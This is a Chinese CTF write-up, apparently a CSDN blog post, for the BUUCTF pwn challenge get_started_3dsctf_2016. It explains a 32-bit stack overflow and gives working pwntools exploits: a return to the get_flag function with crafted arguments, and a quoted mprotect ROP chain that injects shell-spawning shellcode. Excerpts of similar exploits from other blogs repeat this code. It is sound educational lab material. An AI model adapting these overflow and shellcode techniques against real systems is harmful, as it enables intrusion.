BUUCTF--get_started_3dsctf_20161

最新推荐文章于 2024-07-07 17:28:09 发布
最新推荐文章于 2024-07-07 17:28:09 发布
阅读量485 收藏 9
点赞数 6
分类专栏: pwn CTF 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/135549465
版权
CTF 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
pwn
23 篇文章 1 订阅
订阅专栏
文章讲述了作者在解决一道CTF挑战时遇到的困难,涉及32位程序保护机制、参数验证、内存溢出、使用recv获取flag以及利用mprotect和shellcode执行代码的过程。
摘要由CSDN通过智能技术生成

这题我本来以为是简单的ret2text.结果还是中了小坑。

先看保护:

32位程序,接下来测试下效果:

看看IDA中逻辑:

题目一进来有很多函数,盲猜是静态编译了。而且在函数堆中发现了个get_flag。信心慢慢的直接写代码返回get_flag地址。结果发现打不通。最终发现问题如下:

1.打远程的时候他将会判断参数是否合规,因此我们要构造get_flag的参数的正确性。

2.这题在main函数开始的时候没有压入ebp,因此计算溢出位置不用覆盖ebp。也就是说以前的old_ebp的位置变成了现在的返回地址。

3.不需要interactive去交互,需要用recv去接收flag。(一开始没搞明白程序卡在这)

4.构造垃圾数据不用b‘a',打不通。直接'a'就行了

因此我们的exp构造如下:

from pwn import *

io=remote('node5.buuoj.cn',28905)
#io=process('./get_started_3dsctf_2016')
context.log_level = 'debug'

get_flag=0x80489A0
arg_1=0x308CD64F
arg_2=0x195719D1
exit=0x0804E6A0

payload='a'*0x38+p32(get_flag)+p32(exit)+p32(arg_1)+p32(arg_2)


io.sendline(payload)


io.recv()

这题还有一种解法,我是看别的师傅wp才知道的。

 1 from pwn import *
 2 q = remote(')
 3 #q = process('./get_started_3dsctf_2016')
 4 context.log_level = 'debug'
 5 
 6 mprotect = 0x0806EC80
 7 buf = 0x80ea000
 8 pop_3_ret = 0x0804f460
 9 read_addr = 0x0806E140
10 
11 payload = 'a'*56
12 payload += p32(mprotect)
13 payload += p32(pop_3_ret)
14 payload += p32(buf)
15 payload += p32(0x1000)
16 payload += p32(0x7)
17 payload += p32(read_addr)
18 payload += p32(buf)
19 payload += p32(0)
20 payload += p32(buf)
21 payload += p32(0x100)
22 q.sendline(payload)
23 sleep(0.1)
24 
25 shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
26 q.sendline(shellcode)
27 sleep(0.1)
28 q.interactive()

这里贴一下别的师傅的wp

call就不要ret
关注
专栏目录
BUUCTF - PWN】get_started_3dsctf_2016
古月浪子的博客
03-25 1553
checksec一下,可以栈溢出 IDA打开看看,一个很普通的栈溢出漏洞,有后门函数,应该说是一道非常简单的题了 但是,本地打通非常容易,可是靶机打不通 =_= 于是乎,换个方法,利用mprotect函数修改bss段为rwx,写入shellcode跳过去执行 from pwn import * from LibcSearcher import * context.os='linux' con...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 345
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 654
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
BUUCTF get_started_3dsctf_2016
最新发布
zwb2603096342的博客
07-07 1087
mprotect的运用
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 484
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
buuctf之 not_the_same
qq_42728977的博客
02-19 628
题目:not_the_same_3dsctf_2016 环境:ubuntu14 漏洞点:栈溢出、mprotect、shellcode 思路:使用mprotect更改内存权限,通过栈溢出更改程序流程,读入shellcode并执行 参考链接: get_started_3dsctf_2016-Pwn get_started_3dsctf_2016-Pwn 上来就这,感觉这个题很简单啊。 再看看函数列表...
get_started_3dsctf_2016 1
qq_41560595的博客
03-18 782
又是被暴击的一天。 查看文件权限 可以栈溢出,地址写死了。 查看源程序 还是个静态文件,首先想到可以使用Gadget。 分析 存在一个mprotect函数: #include <unistd.h> #include <sys/mmap.h> int mprotect(const void *start, size_t len, int prot); mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot代表着 r-w-x
buuctf get_started_3dsctf_2016
carol2358的博客
04-09 462
先checksec 这道题打远程需要改变内存权限,需要用到mprotec,这道题里也是有这个函数的 这道题有点特殊,是没有bp的,程序的函数调用约定是cdecl,依靠sp来进行平衡栈,需要取值就看与sp的偏移。 padding为0x38 大致的思路就是先找到mprotect,bss,read(向bss写入shell),pop(用来pop出mprotect的参数,进行第二次函数调用)的地址,然后传...
BUUCTF(Pwn)get_started_3dsctf_2016
半岛铁盒的博客
03-27 361
from pwn import * p = remote("node3.buuoj.cn",28584) context.log_level = 'debug' a1 = 0x308cd64f a2 = 0x195719d1 get_flag_addr = 0x080489A0 exit_addr = 0x0804E6A0 payload = 'a'* 0x38 + p32(get_flag_addr) + p32(exit_addr)+ p32(a1) + p32(a2) p.sendline(pay..
BUUCTF get_started_3dsctf_2016(mprotect)
、moddemod
06-10 538
典型的栈溢出 而且还留了后门 在本地可以拿到flag.txt文件,但是远程不行! 栈不可执行 原型: int mprotect(const void *start, size_t len, int prot) start:需改写属性的内存中开始地址 len:需改写属性的内存长度 prot:需要修改为的指定值 功能: mprotect()函数可以用来修改一段指定内存区域的保护属性。 他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值: 1)PRO.
[BUUCTF]PWN11——get_started_3dsctf_2016
mcmuyanga的博客
08-28 3867
[BUUCTF]PWN11——get_started_3dsctf_2016 题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016 步骤: 第一个方法,本地打通,要自己创建一个flag.txt 例行检查,32位,开启了nx保护 nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt 双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x19
BUUCTF pwn——get_started_3dsctf_2016
CNS-Enterprise BCC-1701-J
04-01 122
BUUCTF 做题练习
[BUUCTF-pwn]——get_started_3dsctf_2016
Y_peak的博客
02-10 241
[BUUCTF-pwn]——get_started_3dsctf_2016 题目地址:https://buuoj.cn/challenges#get_started_3dsctf_2016 题目: 这道题让我学到很多细节,虽然又一次栽倒了没有ebp的坑中 首先还是先checksec 一下看看,老样子32位NX保护. IDA中 看到这些,你是不是和我一样觉得so easy!!! 我一开始也觉得这种题 payload = ‘a’ * offest + ‘junk’ + get_flag的地址 +
get_started_3dsctf_2016
qq_45691294的博客
12-17 1396
先进入到题目环境里,程序接收用户输入,然后返回一串字符 checksec查看一下保护,只开启了NX,堆栈不可执行保护 用IDA分析程序,这一段程序很简短,gets函数存在溢出 发现了一个名为get_flag的函数 通过这个函数传入参数,且满足条件(a1 == 814536271 && a2 == 425138641)即可读取到flag 思路就是main函数溢出到返回地址的时候直接溢出到if条件判断里面,即使栈空间被破坏了,但是无所谓,已经输出flag了 这里可以用本地调试判断偏移量
set_clock_groups -asynchronous -group [get_clocks nfc_clk] -group [get_clocks nfc_clk]
05-24
这个命令是用来定义时钟域的异步关系。其中,`-group [get_clocks nfc_clk]` 表示将时钟 `nfc_clk` 所在的时钟域定义为一个组, `-asynchronous` 表示这个组与其他组之间是异步关系。而这个命令中,两个组定义了同一个时钟域,这是不合法的。应该将其中一个改为其他时钟域的名称。例如,如果还有一个时钟叫做 `cpu_clk`,则可以这样写: ``` set_clock_groups -asynchronous -group [get_clocks nfc_clk] -group [get_clocks cpu_clk] ``` 这样就定义了 `nfc_clk` 时钟域和 `cpu_clk` 时钟域之间的异步关系。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值